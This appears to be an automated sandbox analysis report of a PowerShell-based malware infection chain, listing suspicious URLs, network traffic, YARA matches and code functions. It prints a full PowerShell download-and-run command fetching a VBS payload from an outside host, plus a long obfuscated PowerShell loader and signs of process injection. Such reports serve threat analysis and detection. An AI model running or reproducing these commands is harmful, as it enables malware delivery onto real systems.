                        Source: powershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D825AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000001.00000002.3118863696.0000023D91B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2988265247.0000023D833C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3118863696.0000023D919FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: svchost.exe, 0000000F.00000003.2038947683.00000126330C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                        Source: svchost.exe, 0000000F.00000003.2038947683.0000012633056000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                        Source: powershell.exe, 00000006.00000002.1929100523.0000020181790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2160349963.0000000004B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.arecosaldature.it/ef/Skifterne.sea
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D825AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
                        Source: powershell.exe, 00000001.00000002.3137535140.0000023D99AA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ef/ef.vbs
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D82F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D82F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/lm/List
                        Source: powershell.exe, 00000001.00000002.3137535140.0000023D99AA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx
                        Source: powershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.00000201817C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com
                        Source: powershell.exe, 00000006.00000002.1929100523.0000020181790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2160349963.0000000004B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ef/Skifterne.sea
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                        Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49809 version: TLS 1.2
                        Source: Yara matchFile source: 19.3.msiexec.exe.247d0000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.245b0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.svchost.exe.4f80000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.svchost.exe.4d60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.247d0000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000013.00000003.2349020034.00000000247D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2348832921.00000000245B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.2353334391.0000000004D60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.2353660674.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B808CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,21_2_00007DF4F3B808CC

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: amsi32_5232.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 6216, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 5232, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no DeJump to behavior
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_0000022C9E061CF4 NtAcceptConnectPort,CloseHandle,21_2_0000022C9E061CF4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_0000022C9E0615C0 NtAcceptConnectPort,21_2_0000022C9E0615C0
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8F32C NtAcceptConnectPort,free,21_2_00007DF4F3B8F32C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8E25C NtAcceptConnectPort,21_2_00007DF4F3B8E25C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8F180 malloc,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,21_2_00007DF4F3B8F180
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8E150 NtAcceptConnectPort,21_2_00007DF4F3B8E150
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8E170 NtAcceptConnectPort,21_2_00007DF4F3B8E170
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8E094 NtAcceptConnectPort,21_2_00007DF4F3B8E094
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8E3C8 NtAcceptConnectPort,21_2_00007DF4F3B8E3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8E3E8 NtAcceptConnectPort,21_2_00007DF4F3B8E3E8
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8E910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,21_2_00007DF4F3B8E910
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_00007DF483A01958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,25_3_00007DF483A01958
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_00007DF483A01CE8 CreateProcessW,NtResumeThread,CloseHandle,free,25_3_00007DF483A01CE8
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161862CAC NtAcceptConnectPort,25_2_0000017161862CAC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161862E84 NtAcceptConnectPort,25_2_0000017161862E84
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161862EC8 NtAcceptConnectPort,25_2_0000017161862EC8
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161862DDC NtAcceptConnectPort,25_2_0000017161862DDC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161862D80 NtAcceptConnectPort,25_2_0000017161862D80
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161862DAC NtAcceptConnectPort,25_2_0000017161862DAC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186290C NtAcceptConnectPort,25_2_000001716186290C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161862A20 NtAcceptConnectPort,25_2_0000017161862A20
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161863158 NtAcceptConnectPort,25_2_0000017161863158
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839B2E90 NtQuerySystemInformation,malloc,NtQuerySystemInformation,25_2_00007DF4839B2E90
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839E25D4 NtQuerySystemInformation,NtQuerySystemInformation,25_2_00007DF4839E25D4
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF483A0199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,25_2_00007DF483A0199C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF483A01E64 CreateProcessW,NtResumeThread,CloseHandle,25_2_00007DF483A01E64
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5D3970 NtQuerySystemInformation,26_2_0000025C3F5D3970
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B790CD41_2_00007FFD9B790CD4
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B78AB4A6_2_00007FFD9B78AB4A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B78B8D26_2_00007FFD9B78B8D2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7813DC6_2_00007FFD9B7813DC
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B78208D6_2_00007FFD9B78208D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B85A4D96_2_00007FFD9B85A4D9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B859CC96_2_00007FFD9B859CC9
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_049CE6A811_2_049CE6A8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_049CEF7811_2_049CEF78
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_049CE36011_2_049CE360
                        Source: C:\Windows\System32\svchost.exeCode function: 21_3_0000022C9E171BBC21_3_0000022C9E171BBC
                        Source: C:\Windows\System32\svchost.exeCode function: 21_3_0000022C9E1727B221_3_0000022C9E1727B2
                        Source: C:\Windows\System32\svchost.exeCode function: 21_3_0000022C9E172C5221_3_0000022C9E172C52
                        Source: C:\Windows\System32\svchost.exeCode function: 21_3_0000022C9E174A5021_3_0000022C9E174A50
                        Source: C:\Windows\System32\svchost.exeCode function: 21_3_0000022C9E17250D21_3_0000022C9E17250D
                        Source: C:\Windows\System32\svchost.exeCode function: 21_3_0000022C9E175E9421_3_0000022C9E175E94
                        Source: C:\Windows\System32\svchost.exeCode function: 21_3_0000022C9E17559421_3_0000022C9E175594
                        Source: C:\Windows\System32\svchost.exeCode function: 21_3_0000022C9E17591421_3_0000022C9E175914
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_0000022C9E060C7021_2_0000022C9E060C70
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B9D42C21_2_00007DF4F3B9D42C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B808CC21_2_00007DF4F3B808CC
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B6286C21_2_00007DF4F3B6286C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BB52F421_2_00007DF4F3BB52F4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C532F821_2_00007DF4F3C532F8
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BCD2A021_2_00007DF4F3BCD2A0
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BDD24821_2_00007DF4F3BDD248
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B721F021_2_00007DF4F3B721F0
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4A19C21_2_00007DF4F3C4A19C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B810BC21_2_00007DF4F3B810BC
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4E0B021_2_00007DF4F3C4E0B0
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B6105821_2_00007DF4F3B61058
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BBFF7821_2_00007DF4F3BBFF78
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B65F9C21_2_00007DF4F3B65F9C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4D75C21_2_00007DF4F3C4D75C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BE071C21_2_00007DF4F3BE071C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BB564021_2_00007DF4F3BB5640
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4E5F421_2_00007DF4F3C4E5F4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4757821_2_00007DF4F3C47578
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C5A59821_2_00007DF4F3C5A598
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BD13BC21_2_00007DF4F3BD13BC
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C0A3C821_2_00007DF4F3C0A3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C423D821_2_00007DF4F3C423D8
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B943E421_2_00007DF4F3B943E4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BCCB5C21_2_00007DF4F3BCCB5C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4EB0C21_2_00007DF4F3C4EB0C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BA8B2821_2_00007DF4F3BA8B28
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C5AAB421_2_00007DF4F3C5AAB4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B77AE021_2_00007DF4F3B77AE0
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BC0AD421_2_00007DF4F3BC0AD4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B6F9C021_2_00007DF4F3B6F9C0
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C019B421_2_00007DF4F3C019B4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BB395C21_2_00007DF4F3BB395C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B7E97021_2_00007DF4F3B7E970
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BD582421_2_00007DF4F3BD5824
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4E77421_2_00007DF4F3C4E774
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C5DF6C21_2_00007DF4F3C5DF6C
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B80EF421_2_00007DF4F3B80EF4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BCCE4821_2_00007DF4F3BCCE48
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BCCD3821_2_00007DF4F3BCCD38
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BBECF821_2_00007DF4F3BBECF8
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BB3CE821_2_00007DF4F3BB3CE8
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BBCC8421_2_00007DF4F3BBCC84
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4DC9421_2_00007DF4F3C4DC94
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C4BC6821_2_00007DF4F3C4BC68
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3C3DBC821_2_00007DF4F3C3DBC8
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BB6BE421_2_00007DF4F3BB6BE4
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B8CBE821_2_00007DF4F3B8CBE8
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_00007DF483A0392C25_3_00007DF483A0392C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_00007DF483A04EFC25_3_00007DF483A04EFC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_00007DF483A0220425_3_00007DF483A02204
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
